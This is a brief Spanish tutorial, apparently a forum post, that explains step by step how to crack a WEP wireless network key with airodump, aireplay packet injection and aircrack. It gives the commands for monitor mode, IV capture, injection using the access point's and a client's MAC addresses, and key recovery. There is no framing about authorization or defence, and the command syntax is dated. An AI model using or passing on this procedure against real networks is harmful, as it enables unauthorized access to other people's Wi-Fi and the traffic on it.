1. Primero la tarjeta en modo monitor por supuesto, normalmente: iwconfig (interfaz) mode monitor 2. Segundo, lanzamos airodump para ver las redes y clientes conectados a ellas: airodump (interfaz) (nombre_archivo) (channel) 1 El 1 para q solo guarde los IV, no todo el paquete. Si ponemos 0 en el canal, mirara en todos los canales. 3. Tercero, se inyectan paquetes para acelerar el proceso: aireplay -x 512 (interfaz) -3 -b 0:0:0:0:0 -h 1:1:1:1:1 Los ceros corresponden a la MAC del AP y los unos a la de un equipo conectado a ese AP. 4. Cuarto, se lanza aircrack para sacar la clave: aircrack -n 64 (nombrearchivo).ivs -n 64 para claves WEP de 64 bits, para las de 128 seria -n 128. Se pueden ejecutar las 3 aplicaciones a la vez, así mientras sigues capturando claves, el aircrack ya está trabajando xD